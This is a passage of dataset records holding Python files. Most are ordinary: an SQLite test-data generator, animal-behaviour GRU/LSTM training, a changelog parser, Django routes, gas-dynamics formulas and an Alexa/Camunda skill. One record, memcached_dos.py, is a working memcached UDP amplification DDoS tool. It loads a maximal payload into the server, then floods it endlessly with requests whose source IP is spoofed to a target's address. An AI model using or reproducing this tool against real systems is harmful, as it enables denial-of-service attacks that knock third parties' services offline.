row_entry.append(generate_year())\n elif column_type == str:\n row_entry.append(generate_text())\n elif column_type == int:\n row_entry.append(generate_int())\n elif column_type == float:\n row_entry.append(generate_float())\n elif column_type == bool:\n row_entry.append(generate_bool())\n else:\n raise TypeError(f'Column type must be one of: str, int, float, but was of type {column_type}')\n rows.append(row_entry)\n columns = [f'{column_name}' for column_name, column_type in cls.__annotations__.items()]\n columns_joined = ', '.join(columns)\n values_questionmarks = ','.join('?' 
for _ in columns)\n logger.info(f\"Inserting the following rows into table '{cls.__name__}':\")\n for row in rows:\n logger.info(f'{row}')\n db.executemany(\n f\"\"\"\n INSERT INTO {cls.__name__} ({columns_joined})\n VALUES ({values_questionmarks})\n \"\"\",\n rows,\n )\n\n def add_item_to_db(self, db: sqlite3.Connection):\n columns = [f'{column_name}' for column_name, column_type in self.__annotations__.items()]\n columns_joined = ', '.join(columns)\n values = [self.__dict__[column_name] for column_name in columns]\n values_joined = ', '.join(map(repr, values))\n table_name = self.__class__.__name__\n insert_string = f\"\"\"\n INSERT INTO {table_name} ({columns_joined})\n VALUES ({values_joined})\n \"\"\"\n logger.info(f\"Inserting: values '{values_joined}' into columns '{columns_joined}' into table '{table_name}'\")\n db.execute(insert_string)\n\n # @classmethod\n # def print_table(cls, db: sqlite3.Connection):\n # pass\n\n\n# Define tables\n\n\n@dataclass\nclass Song(SqlMetaclass):\n song_id: int\n song_name: str\n artist_id: int\n album_id: int\n genre: str\n song_length: int\n\n\n@dataclass\nclass Album(SqlMetaclass):\n album_id: int\n album_name: str\n publish_year: int\n\n\n@dataclass\nclass Artist(SqlMetaclass):\n artist_id: int\n artist_name: str\n birth_year: int\n verified: bool\n\n\nif __name__ == '__main__':\n with sqlite3.connect(':memory:') as db:\n cls: Type[SqlMetaclass]\n for cls in [Song, Album, Artist]:\n # Create tables\n cls.create_table(db)\n # Generate data\n cls.generate_data(db, amount=3)\n\n # Add custom items to db\n Song(\n song_id=generate_int(),\n song_name=generate_name(),\n artist_id=generate_int(),\n album_id=1869690,\n genre=generate_text(),\n song_length=generate_int(),\n ).add_item_to_db(db)\n\n # Print data in database\n # TODO print data as table where each column has same width\n result = db.execute('SELECT * FROM Song')\n for i in result:\n # logger.info(Song(*i))\n pass\n\n # Run test query\n result = db.execute(\n \"\"\"\n SELECT song_name, album_name, publish_year FROM Song JOIN Album\n ON Song.album_id = Album.album_id\n \"\"\",\n )\n result_list = list(map(list, result))\n\n # Compare result to expected\n expected = [['Jeannette Macha', 'doloribus unde', 1984]]\n assert result_list == expected, f'{result_list} != {expected}'\n","sub_path":"example_package/burny_test_template/SQL_tester.py","file_name":"SQL_tester.py","file_ext":"py","file_size_in_byte":5788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
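The interesting trick in this record is that `SqlMetaclass` derives the DDL from plain class annotations, so the `@dataclass` models double as table definitions. The mechanism in isolation, with an illustrative class name and standard library only:

```python
import sqlite3

COLUMN_TYPES = {str: "TEXT", int: "INT", float: "REAL", bool: "BOOLEAN"}

class Playlist:
    playlist_id: int
    playlist_name: str
    public: bool

# class-level annotations are available on the class itself (PEP 526)
columns = ", ".join(
    f"{name} {COLUMN_TYPES[tp]}" for name, tp in Playlist.__annotations__.items()
)
with sqlite3.connect(":memory:") as db:
    db.execute(f"CREATE TABLE Playlist ({columns})")
    # placeholders, as generate_data() builds them for executemany
    db.execute("INSERT INTO Playlist VALUES (?, ?, ?)", (1, "road trip", True))
    print(db.execute("SELECT * FROM Playlist").fetchall())  # [(1, 'road trip', 1)]
```

Note that `add_item_to_db` in the record interpolates values with `repr` instead of using placeholders; the `?` style shown here is the safer default.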
+{"seq_id":"386978667","text":"#!/usr/bin/env python3.7\n# -*- coding:utf-8 -*-\nimport click\nimport socket\nimport memcache\nimport random\n\nfrom scapy.all import UDP, IP, send\n\n\nmemcached_ip = None\nmemcached_port = None\n\n\n@click.group()\n@click.option(\"--server-ip\", required=True, type=str, help=\"set memcached ip\")\n@click.option(\"--server-port\", default=11211, type=int, help=\"set memcached port\")\ndef commands(server_ip, server_port):\n global memcached_ip, memcached_port\n memcached_ip = str(server_ip)\n memcached_port = int(server_port)\n click.echo(\"[*] memcached ip = %s\"%memcached_ip)\n click.echo(\"[*] memcached port = %d\"%memcached_port)\n\n\n@commands.command()\ndef setpayload():\n client = memcache.Client([\"%s:%d\"%(memcached_ip, memcached_port)])\n\n max_len = 0\n block = 1 << 10\n while True:\n indent = 1\n while True:\n temp_len = max_len + block*indent\n client.set(\"payload\", \"*\"*temp_len)\n saved_data = client.get(\"payload\")\n if saved_data is None or len((saved_data)) != temp_len:\n indent >>= 1\n break\n indent <<= 1\n max_len += block*indent\n block >>= 1\n if 0==block:\n block = 1\n if 0==indent and 1==block:\n break\n\n client.set(\"payload\", \"*\"*max_len)\n click.echo(\"[*] set payload success, data max length = %d\"%len(client.get(\"payload\")))\n\n\n@commands.command()\n@click.option(\"--target-ip\", \"-tip\", required=True, type=str, help=\"set target ip\")\ndef attack(target_ip):\n click.echo(\"[*] target ip = %s\"%target_ip)\n # data 前置8字节头,来自https://github.com/memcached/memcached/blob/master/doc/protocol.txt,\n # The frame header is 8 bytes long, as follows (all values are 16-bit integers\n # in network byte order, high byte first):\n # 0-1 Request ID\n # 2-3 Sequence number\n # 4-5 Total number of datagrams in this message\n # 6-7 Reserved for future use; must be 0\n data = \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00get payload\\r\\n\"\n udp_header = UDP(dport=memcached_port, sport=random.randint(10000, 60000))\n ip_header = IP(dst=memcached_ip, src=target_ip)\n pkt=ip_header/udp_header/data\n send(pkt, loop=1)\n\n\nif __name__ == \"__main__\":\n commands()\n\n","sub_path":"memcached_dos/memcached_dos.py","file_name":"memcached_dos.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"354883280","text":"# -*- coding: utf-8 -*-\n\"\"\" Binary behavior classification split2\n\"\"\"\n\n__author__ = 'Knut-Henning Kofoed'\n__email__ = 'knut-henning@hotmail.com'\n\n\nimport preprocessing_package as pp\nimport visualize_package as vp\nimport machinelearn_package as mlp\nimport numpy as np\nimport pandas as pd\nfrom tensorflow import keras\n\n\n#%% Data prepro\n# Import activity observations\nact = pp.import_activity('behavior\\\\behaviors.csv')\n\n# Correct time to UTC\nact_35396 = act[act['Nofence ID'] == 35396]\nact_37368 = act[act['Nofence ID'] == 37368]\nact_35396 = pp.offset_time(act_35396, column='Tid', hour=-2, finetune=True, second=19)\nact_37368 = pp.offset_time(act_37368, column='Tid', hour=-2, finetune=False, second=0)\nact = pd.concat([act_35396, act_37368])\n\n# Connect activity observations with accelerometerdata\nserials = pp.unique_serials(act)\nstart_stop = pp.activity_time_interval(act)\nacc = pp.import_aks(serials, start_stop)\nacc_act = pp.connect_data(act, acc)\n\n# Visualize\nvp.show_timestep_freq(pp.select_serial(acc_act, serials[0]))\nvp.show_serial_dist(acc_act)\nvp.plot_acc(acc_act, serials)\nvp.plot_acc(acc_act, serials, plot_all=False)\n\n\n#%% Machinelearning preprocessing\n# Change behaviors so that it is binary\nmlp.replace_class(acc_act, {2: 1, 3: 1})\n\n# Data splitting\natt = ['xcal', 'ycal', 'zcal', 'norm']\nclasses = ['Hviler', 'Bevegelse']\nX_train, y_train, X_val, y_val, X_test, y_test = mlp.create_ser_train_test(acc_act,\n serials[1],\n serials[0],\n 'test',\n 0.5,\n 'right',\n att)\n\nvp.plot_classbal_trainsplit(y_train, y_val, y_test, classes, show_title=True)\n\n#%% GRU hyper param tuning multi-classification\ngru_config_dict = {\"scaler\": ['standardscaler'],\n \"time_steps\": [32, 64, 96],\n \"step\": [15, 31, 62],\n \"conv1d_filters\": [10, 20, 50, 100],\n \"gru_units\": [16, 32, 64, 96],\n \"learn_rate\": [0.001],\n \"epochs\": [100],\n \"batch_size\": [32, 64, 128]\n }\n\nmlp.create_hyp_report(\n X_train, y_train, \n X_val, y_val, \n X_test, y_test, \n 'gru', gru_config_dict,\n att, 'binary', 'split2', show_epochs=True\n )\n\n\n#%% Best params for GRU\n# Reload model and data\nbinary_gru_losses = np.load('BestModels\\\\binary\\\\GRU\\\\split2\\\\val_losses.npy')\n\nbinary_gru_report = []\n\nfor i, model in enumerate(binary_gru_losses):\n binary_gru_model = keras.models.load_model('BestModels\\\\binary\\\\GRU\\\\split2\\\\model{}'.format(i))\n binary_gru_X_test = np.load('BestModels\\\\binary\\\\GRU\\\\split2\\\\model{}_Xtest.npy'.format(i))\n binary_gru_y_test = np.load('BestModels\\\\binary\\\\GRU\\\\split2\\\\model{}_ytest.npy'.format(i))\n\n # Model summary\n binary_gru_model.summary()\n \n # Evaluate and plot confusion matrix\n binary_gru_model.evaluate(binary_gru_X_test, binary_gru_y_test)\n\n y_test_n = np.argmax(binary_gru_y_test, axis=1) # Convert from onehot back to normal labels\n y_pred_n = np.argmax(binary_gru_model.predict(binary_gru_X_test), axis=-1)\n vp.plot_matrix(y_test_n, y_pred_n, classes, 'GRU', 'binary', show_title=False)\n binary_gru_report.append(vp.plot_pandas_classification_report(y_test_n, y_pred_n))\n\n\n\n#%% LSTM multi-classification\nlstm_config_dict = {\"scaler\": ['standardscaler'],\n \"time_steps\": [32, 64, 96],\n \"step\": [15, 31, 62],\n \"lstm_units\": [64, 96, 128],\n \"dropout\": [0, 0.2],\n \"dense_units\": [6, 10],\n \"learn_rate\": [0.001],\n \"epochs\": [100],\n \"batch_size\": [32, 64, 128]\n }\n\nmlp.create_hyp_report(\n X_train, y_train, \n X_val, y_val, \n X_test, y_test, 
\n 'lstm', lstm_config_dict, \n att, 'binary', 'split2', show_epochs=True\n )\n\n\n#%% Best params for LSTM\n# Reload model and data\nbinary_lstm_losses = np.load('BestModels\\\\binary\\\\LSTM\\\\split2\\\\val_losses.npy')\n\nbinary_lstm_report = []\n\nfor i, model in enumerate(binary_lstm_losses):\n binary_lstm_model = keras.models.load_model('BestModels\\\\binary\\\\LSTM\\\\split2\\\\model{}'.format(i))\n binary_lstm_X_test = np.load('BestModels\\\\binary\\\\LSTM\\\\split2\\\\model{}_Xtest.npy'.format(i))\n binary_lstm_y_test = np.load('BestModels\\\\binary\\\\LSTM\\\\split2\\\\model{}_ytest.npy'.format(i))\n\n # Model summary\n binary_lstm_model.summary()\n \n # Evaluate and plot confusion matrix\n binary_lstm_model.evaluate(binary_lstm_X_test, binary_lstm_y_test)\n\n y_test_n = np.argmax(binary_lstm_y_test, axis=1) # Convert from onehot back to normal labels\n y_pred_n = np.argmax(binary_lstm_model.predict(binary_lstm_X_test), axis=-1)\n vp.plot_matrix(y_test_n, y_pred_n, classes, 'LSTM', 'binary', show_title=False)\n binary_lstm_report.append(vp.plot_pandas_classification_report(y_test_n, y_pred_n))\n\n","sub_path":"binary_behavior_split2.py","file_name":"binary_behavior_split2.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
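Both `*_config_dict`s are lists-per-key grids. How `mlp.create_hyp_report` walks them is not shown in this file, so the usual expansion, a Cartesian product over the keys, is an assumption here; a sketch of it:

```python
from itertools import product

def expand_grid(config_dict):
    """Expand a {key: [candidate values]} dict into one dict per combination."""
    keys = list(config_dict)
    return [dict(zip(keys, values)) for values in product(*(config_dict[k] for k in keys))]

grid = {"time_steps": [32, 64, 96], "gru_units": [16, 32], "batch_size": [32, 64]}
print(len(expand_grid(grid)))  # 3 * 2 * 2 = 12 candidate configurations
```

Written this way, the full GRU grid above (3 * 3 * 4 * 4 * 1 * 1 * 3 combinations) is easy to size before committing to a run.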
+{"seq_id":"128191555","text":"from typing import Dict, Iterable, Iterator, Type, TypeVar\n\nfrom newversion import Version\n\nfrom logchange.constants import MAJOR_SECTION_TITLES, MINOR_SECTION_TITLES, SECTION_TITLES\nfrom logchange.record_section import RecordSection\nfrom logchange.utils import dedent\n\n_R = TypeVar(\"_R\", bound=\"RecordBody\")\n\n\nclass RecordBody:\n \"\"\"\n Keep a changelog release body.\n \"\"\"\n\n PARTS_DELIM = \"\\n\\n\"\n\n def __init__(\n self,\n sections: Iterable[RecordSection] = (),\n prefix: str = \"\",\n postfix: str = \"\",\n ) -> None:\n self._sections: Dict[str, RecordSection] = {i: RecordSection(i, \"\") for i in SECTION_TITLES}\n self.prefix: str = prefix\n self.postfix: str = postfix\n for section in sections:\n self.append_lines(section.title, section.body)\n\n @property\n def sections(self) -> Iterator[RecordSection]:\n \"\"\"\n Iterate over non-empty sections.\n\n Yields:\n RecordSection.\n \"\"\"\n for section in self._sections.values():\n if section.is_empty():\n continue\n yield section\n\n def bump_version(self, old_version: Version) -> Version:\n \"\"\"\n Bump version based on present changelog sections.\n \"\"\"\n section_titles = {i.title for i in self.sections}\n if section_titles & MAJOR_SECTION_TITLES:\n return old_version.bump_major()\n if section_titles & MINOR_SECTION_TITLES:\n return old_version.bump_minor()\n\n return old_version.bump_micro()\n\n def bump_rc_version(self, old_version: Version) -> Version:\n \"\"\"\n Bump ReleaseCandidate version.\n \"\"\"\n new_version = self.bump_version(old_version)\n if old_version.get_stable() == new_version:\n return old_version.bump_prerelease()\n\n return new_version.replace(rc=1)\n\n def get_section(self, title: str) -> RecordSection:\n \"\"\"\n Get section by `title`.\n\n Arguments:\n title -- Section title.\n\n Returns:\n Found Record Section.\n \"\"\"\n title = title.lower()\n if title not in self._sections:\n raise ValueError(f\"Invalid section title: {title}\")\n\n return self._sections[title.lower()]\n\n def render(self) -> str:\n \"\"\"\n Render to string.\n \"\"\"\n parts = []\n\n if self.prefix:\n parts.append(self.prefix)\n\n for section_title in SECTION_TITLES:\n section = self.get_section(section_title)\n if section.is_empty():\n continue\n parts.append(section.render())\n\n if self.postfix:\n parts.append(self.postfix)\n\n parts = [i for i in parts if i]\n return self.PARTS_DELIM.join(parts)\n\n def set_section(self, title: str, body: str) -> None:\n \"\"\"\n Change section `title` text content to `body`.\n \"\"\"\n self.get_section(title).body = body\n\n def append_lines(self, title: str, text: str) -> None:\n \"\"\"\n Append text after new line to `title` section.\n\n Arguments:\n title -- Section title.\n text -- Text to append.\n \"\"\"\n self.get_section(title).append_lines(text)\n\n def append_to_all(self, text: str) -> None:\n \"\"\"\n Append `text` to all non-empty sections.\n \"\"\"\n for section in self.sections:\n section.append(text)\n\n def get_merged(self: _R, other: _R) -> _R:\n \"\"\"\n Create a new body from current and `other`.\n\n Arguments:\n other -- Other record body.\n\n Returns:\n New RecordBody.\n \"\"\"\n result = self.__class__()\n for section_title in SECTION_TITLES:\n old_section = self.get_section(section_title)\n new_section = other.get_section(section_title)\n result.append_lines(section_title, old_section.body)\n result.append_lines(section_title, new_section.body)\n\n return result\n\n @staticmethod\n def _parse_prefix_section(line: str) -> 
str:\n        if \":\" not in line:\n            return \"\"\n\n        line_lower = line.lower()\n        for section_title in SECTION_TITLES:\n            if line_lower.startswith(f\"{section_title}:\"):\n                return section_title\n\n        return \"\"\n\n    @staticmethod\n    def _parse_header_title(line: str) -> str:\n        if line.startswith(\"#\") and \" \" in line:\n            title = line.split()[1].lower()\n            if title in SECTION_TITLES:\n                return title\n        return \"\"\n\n    @staticmethod\n    def _has_header(line: str) -> bool:\n        return line.startswith(\"#\") and \" \" in line\n\n    @classmethod\n    def parse(cls: Type[_R], text: str) -> _R:\n        \"\"\"\n        Parse RecordBody from `text`.\n        \"\"\"\n        text = dedent(text)\n        title = \"\"\n        prefix_lines = []\n        postfix_lines = []\n        codeblock = False\n        result = cls()\n        for line in text.splitlines():\n            if line.startswith(\"```\"):\n                codeblock = not codeblock\n            if not codeblock:\n                if cls._has_header(line):\n                    title = cls._parse_header_title(line)\n                    if title:\n                        continue\n\n                prefix_title = cls._parse_prefix_section(line)\n                if prefix_title:\n                    result.append_lines(prefix_title, line[len(prefix_title) + 1 :].strip())\n                    continue\n\n            if title:\n                result.append_lines(title, line)\n            else:\n                if result.is_empty():\n                    prefix_lines.append(line)\n                else:\n                    postfix_lines.append(line)\n\n        result.prefix = dedent(\"\\n\".join(prefix_lines))\n        result.postfix = dedent(\"\\n\".join(postfix_lines))\n        return result\n\n    def is_empty(self) -> bool:\n        \"\"\"\n        Whether body has no text.\n        \"\"\"\n        if self.prefix or self.postfix:\n            return False\n\n        for _ in self.sections:\n            return False\n\n        return True\n\n    def sanitize(self) -> None:\n        \"\"\"\n        Remove prefix and postfix.\n        \"\"\"\n        self.prefix = \"\"\n        self.postfix = \"\"\n\n    def __copy__(self: _R) -> _R:\n        return self.__class__(\n            prefix=self.prefix, postfix=self.postfix, sections=(i for i in self.sections)\n        )\n\n    def clone(self: _R) -> _R:\n        \"\"\"\n        Get a copy of record body.\n        \"\"\"\n        return self.__copy__()\n\n    def clear(self) -> None:\n        \"\"\"\n        Remove all text from record body.\n        \"\"\"\n        self.sanitize()\n        for section in self.sections:\n            section.body = \"\"\n","sub_path":"logchange/record_body.py","file_name":"record_body.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
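The `bump_version` logic reduces to one rule: any section from the MAJOR group forces a major bump, otherwise any section from the MINOR group forces a minor bump, otherwise only the micro version moves. The actual groupings live in `logchange.constants` and are not shown in this record, so the sets below are an assumption in the spirit of Keep a Changelog:

```python
MAJOR = {"removed", "changed"}   # assumed contents of MAJOR_SECTION_TITLES
MINOR = {"added", "deprecated"}  # assumed contents of MINOR_SECTION_TITLES

def bump(major, minor, micro, section_titles):
    """Return the next (major, minor, micro) given the non-empty section titles."""
    titles = {t.lower() for t in section_titles}
    if titles & MAJOR:
        return (major + 1, 0, 0)
    if titles & MINOR:
        return (major, minor + 1, 0)
    return (major, minor, micro + 1)

assert bump(1, 2, 3, ["Added"]) == (1, 3, 0)   # minor bump
assert bump(1, 2, 3, ["Fixed"]) == (1, 2, 4)   # micro bump
```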
+{"seq_id":"344337224","text":"from django.urls import path\nfrom . import views\n\napp_name=\"issueaccount\"\n\nurlpatterns = [\n path('entrance/', views.entrance.as_view(), name='entrance'),\n path('get_datasource/', views.get_datasource.as_view(), name='get_datasource'),\n path('edit/', views.edit.as_view(), name='edit'),\n path('insert/', views.insert.as_view(), name='insert'),\n path('get_originbill_datasource/', views.get_originbill_datasource.as_view(), name='get_originbill_datasource'),\n path('get_material_datasource/', views.get_material_datasource.as_view(), name='get_material_datasource'),\n path('recevoid/', views.recevoid.as_view(), name='recevoid')\n]","sub_path":"issueaccount/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"448927620","text":"import datetime\n# from config import db_cursor as cursor, db_conn as conn\nfrom exceptions.dao_exceptions import DaoExceptionError\nimport psycopg2\n\ndef create_query(cursor):\n try:\n today = (datetime.date.today())\n year = today.year\n month = today.month\n day = today.day\n query_date_data = {\"year\": year, \"month\": month, \"day\": day}\n query_number = ''' select * from query_number where day={} limit 1; '''\n cursor.execute(query_number.format(day))\n row = cursor.fetchone()\n if not row:\n new_query = '''insert into query_number (query, month, year, day) values({query}, {month}, {year}, {day});'''\n query_date_data['query'] = 1\n cursor.execute(new_query.format(**query_date_data))\n # cursor.close()\n query_id = str(day).zfill(2) + str(month).zfill(2) + str(year) + str(1).zfill(4)\n return query_id\n\n if row['year'] != year or row['month'] != month or row['day'] != day:\n query = 1\n else:\n query = row['query']+1\n \n update_query = ''' update query_number set query={query}, month={month}, year={year}, day={day} where id = {row_id};'''\n\n query_date_data['query'] = query\n query_date_data['row_id'] = row['id']\n\n cursor.execute(update_query.format(**query_date_data))\n \n # cursor.close()\n query_id = str(day).zfill(2) + str(month).zfill(2) + str(year) + str(query).zfill(4)\n # 100/0\n return query_id\n \n except Exception as e:\n # conn.rollback()\n raise DaoExceptionError(status_code=400, message=\"error in query number genration\")\n\n","sub_path":"utils/query_number_generator.py","file_name":"query_number_generator.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"453725694","text":"from local.test import *\nfrom local.imports import *\nfrom local.notebook.showdoc import show_doc\nfrom local.core import *\nfrom local.core import _listify\n\n####################\n#### run this block to rewrite class L from scratch\n# class L(GetAttr, metaclass=NewChkMeta):\n# \"Behaves like a list of `items` but can also index with list of indices or masks\"\n# _xtra = [o for o in dir(list) if not o.startswith('_')]\n####################\n\nshow_doc(L)\n\n@patch\ndef L_doc(cls:L):\n \"\"\"\n why need `L`?\n - although with `_listify`, we can make everything a list\n - but don't we always wish for more features to work on a list of things?\n - why don't we add more flexibilities and functionalities beyond 'list'\n\n What new features `NewChkMeta` offer us with `L`?\n - create a new L object from values `items`\n - if `items` is instance of `L`, return the instance\n\n What new features `GetAttr` offer to `L`?\n - inherit from `GetAttr`, `L` can borrow others' methods\n - it actually can borrow all methods from `list` with `_xtra`\n \"\"\"\n\nshow_doc(L.L_doc)\n\n@patch\ndef __init__(cls:L, items=None, *rest, use_list=False, match=None):\n \"\"\"\n why need `L`?\n - although with `_listify`, we can make everything a list\n - but don't we always wish for more features to work on a list of things?\n - why don't we add more flexibilities and functionalities beyond 'list'\n\n What new features `NewChkMeta` offer us with `L`?\n - create a new L object from values `items`\n - if `items` is instance of `L`, return the instance\n\n What new features `GetAttr` offer to `L`?\n - inherit from `GetAttr`, `L` can borrow others' methods\n - it actually can borrow all methods from `list` with `_xtra`\n\n #####################\n why need __init__?\n - obviously, we need a way to create such a L thing\n\n how to use __init__?\n - `L(None)`\n - `L(1,2,3)`\n - `L((1,2,3))`\n - `L(array(1,2,3))`\n - `L(tensor(1,2,3))`\n - `L(range(5, 10))`\n - `L(4, match=[1,2,3])`\n - `L(tensor(1,2,3), use_list=True)`\n - `L(...)` does not return anything, only manages items\n\n how does __init__ work?\n - first, we deal with `items` as None, turn it `[]`\n - then, we make `items` a list by `_listify(items)`\n - we can make `items` a strange list by `list(items)`\n - toggled by `use_list = True`\n - a single array or tensor break down into pieces\n - then we add flexibility to do `L.__init__(1,2,3)`\n - using `cls.items += list(rest)`,\n - just like we did in `core.tensor`\n - we can duplicate `items` `len(match)` times\n \"\"\"\n items = [] if items is None else items\n cls.items = cls.default = list(items) if use_list else _listify(items)\n cls.items += list(rest)\n if match is not None:\n if len(cls.items)==1: cls.items = cls.items*len(match)\n else: assert len(cls.items)==len(match), 'Match length mismatch'\n\nshow_doc(L.__init__)\nL(None)\nL(1,2,3)\nL((1,2,3))\nL([1,2,3], ['a', 'b', 'c']) # watch out!\nL(array([1,2,3]))\nL(tensor(1,2,3))\nL(range(5, 10))\nL(4, match=[1,2,3])\nL(tensor(1,2,3), use_list=True)\nmap(str, L(1,2,3))\nmap(str, L(1,2,3).items)\nL(1,2,3).__dir__()\n","sub_path":"my_workstation/my-v2/core.L.__init__.py","file_name":"core.L.__init__.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"313379136","text":"import numpy as np \nfrom copy import copy\n#### GASDYNAMICS V1.0\n\n# VARIABLE NOMENCLATURE:\n#\t- M: mach number\n#\t- nu: prandtl-meyer function\n#\t- T: temperature\n#\t- p: pressure\n#\t- rho: density\n\n# EXPLICIT RELATIONS ##########################################\n\n# Supersonic flow\ndef mach_angle(M,degrees=0):\n\t# computes mach angle (M > 1)\n\tmu = np.arcsin(1/M)\n\tif (degrees):\n\t\treturn mu*180/np.pi\n\telse:\n\t\treturn mu\n\ndef prandtl_meyer(M,gamma,degrees=0):\n\t# computes prandtl-meyer function (M > 1)\n\tnu = np.sqrt((gamma+1)/(gamma-1))*np.arctan(np.sqrt((gamma-1)/(gamma+1)*(M**2-1))) - np.arctan(np.sqrt(M**2-1))\n\tif (degrees):\n\t\treturn nu*180/np.pi \n\telse:\n\t\treturn nu\n\n# Isentropic flow\ndef isentropic_ratios(M_1,M_2,gamma):\n\t# computes isentropic flow ratio between two points in flow (T_2/T_1, p_2/p_1, rho_2/rho_1)\n\tT_ratio = (1+(gamma-1)/2*M_1**2)/(1+(gamma-1)/2*M_2**2)\n\tp_ratio = T_ratio**(gamma/(gamma-1))\n\trho_ratio = T_ratio**(1/(gamma-1))\t\n\ta_ratio = np.sqrt(T_ratio)\n\treturn T_ratio,p_ratio,rho_ratio,a_ratio\n\ndef expansion_ratio(M_1,M_2,gamma):\n\t# returns area of expansion ratio A_2/A_1\n\treturn M_1/M_2*((2+(gamma-1)*M_2**2)/(2+(gamma-1)*M_1**2))**((gamma+1)/(2*(gamma-1)))\n\n# Important rocket relations\ndef PR_expansion_mach(PR,gamma):\n\t# returns mach number given pressure ratio\n\treturn np.sqrt(((PR)**((gamma-1)/gamma)-1)*2/(gamma-1))\n\n# IMPLICIT RELATIONS ##########################################\ndef prandtl_meyer_zero(M,nu,gamma):\n\treturn np.sqrt((gamma+1)/(gamma-1))*np.arctan(np.sqrt((gamma-1)/(gamma+1)*(M**2-1))) - np.arctan(np.sqrt(M**2-1)) - nu\n\ndef expansion_ratio_zero(M_1,M_2,gamma,epsilon):\n\treturn M_1/M_2*((2+(gamma-1)*M_2**2)/(2+(gamma-1)*M_1**2))**((gamma+1)/(2*(gamma-1))) - epsilon\n\ndef mach_angle_velocity_ratio(mu,W,gamma):\n\treturn np.sin(mu) - np.sqrt((gamma-1)/2*(1/W**2-1))\n\n# STANDARD ATMOSPHERE #########################################\n# constants declaration\n\n\ndef standard_atmosphere(altitude):\n\t# 1976 US Standard Atmosphere\n\n\tps = 101325\n\trhos = 1.225\n\tTs = 288.15\n\n\tR = 287.0531\n\tg_0 = 9.80665\n\ta = -6.5/1000\n\tearth_radius = 6.356766*10**6\n\taltitude = copy(altitude)\n\tp_atm_range = copy(altitude)\n\tT_atm_range = copy(altitude)\n\trho_atm_range = copy(altitude)\n\tfor i in range(len(altitude)):\n\t\th = earth_radius/(earth_radius + altitude[i])*altitude[i] #geopotential alt.\n\t\t#h = 20000\n\n\t\tif (h<=11000):\n\t\t# gradient (troposphere) region\n\t\t\tT_atm = Ts + a*h;\n\t\t\tp_atm = ps*(T_atm/Ts)**-(g_0/(a*R))\n\t\t\trho_atm = rhos*(T_atm/Ts)**-(1+g_0/(a*R))\n\t\telse:\n\t\t# contant temperature (stratosphere)region ~20000m (65616.8ft), should check\n\t\t\t# values at boundary\n\t\t\tT_atm = Ts + a*11000\n\t\t\tp1 = ps*(T_atm/Ts)**(-g_0/(a*R))\n\t\t\trho1 = rhos*(T_atm/Ts)**-(1+g_0/(a*R))\n\n\t\t\t# values at elevation\n\t\t\tp_atm = p1*np.exp(-g_0/(R*T_atm)*(h-11000))\n\t\t\trho_atm = rho1*np.exp(-g_0/(R*T_atm)*(h-11000))\n\t\tp_atm_range[i] = p_atm\n\t\tT_atm_range[i] = T_atm \n\t\trho_atm_range[i] = rho_atm \n\n\tif len(altitude) > 1:\n\t\treturn (p_atm_range,T_atm_range,rho_atm_range)\n\telse:\n\t\treturn (p_atm,T_atm,rho_atm)","sub_path":"angelinoNozzle_py/gasdynamics.py","file_name":"gasdynamics.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"421090882","text":"# -*- coding: utf-8 -*-\n\n# This sample demonstrates handling intents from an Alexa skill using the Alexa Skills Kit SDK for Python.\n# Please visit https://alexa.design/cookbook for additional examples on implementing slots, dialog management,\n# session persistence, api calls, and more.\n# This sample is built using the handler classes approach in skill builder.\nimport logging\nimport ask_sdk_core.utils as ask_utils\nimport requests\n\n\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.dispatch_components import AbstractRequestHandler\nfrom ask_sdk_core.dispatch_components import AbstractExceptionHandler\nfrom ask_sdk_core.handler_input import HandlerInput\n\nfrom ask_sdk_model import Response\n\nfrom ask_sdk_model.dialog import ElicitSlotDirective, ConfirmIntentDirective, ConfirmSlotDirective\nfrom ask_sdk_model import (\n Intent, IntentConfirmationStatus, Slot, SlotConfirmationStatus)\nfrom ask_sdk_model.dialog_state import DialogState\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\ncamunda_url = \"https://dcd56278b9d2.ngrok.io\"\ncurrent_user = \"anna\"\ncurrent_group = \"service\"\ncurrent_task = None\n\n\ndef get_current_task(assignee):\n \"\"\"Holt alle Aufgaben, die dem assignee zugewiesen sind.\n Sind keine da oder geht etwas schief, wird der aktuelle Task auf NONE gesetzt.\"\"\"\n global current_task\n try:\n current_task = None\n alle_meine_tasks_request = requests.get(\n f\"{camunda_url}/rest/task?assignee={assignee}&sortBy=created&sortOrder=asc\")\n if alle_meine_tasks_request.status_code == 200:\n alle_meine_tasks = alle_meine_tasks_request.json()\n if len(alle_meine_tasks) != 0:\n current_task = alle_meine_tasks[0]\n except:\n logger.info(\"get_current_task(assignee): request failed\")\n\n\ndef claim_new_task(candidateGroup, assignee):\n \"\"\"Die älteste, verfügbare Aufgabe der candidateGroup wird dem assignee zugewiesen.\"\"\"\n try:\n alle_service_tasks_request = requests.get(\n f\"{camunda_url}/rest/task?candidateGroup={candidateGroup}&unassigned=true&sortBy=created&sortOrder=asc\")\n if alle_service_tasks_request.status_code == 200:\n alle_service_tasks = alle_service_tasks_request.json()\n if len(alle_service_tasks) > 0:\n oldest_task_id = alle_service_tasks[0]['id']\n requests.post(\n f\"{camunda_url}/rest/task/{oldest_task_id}/assignee\", json={\"userId\": assignee})\n get_current_task(assignee)\n except:\n logger.info(\"claim_new_Task(candidateGroup, assignee): request failed\")\n\n\ndef complete_task_failed(handler_input):\n \"\"\"Wenn das Abschließen einer 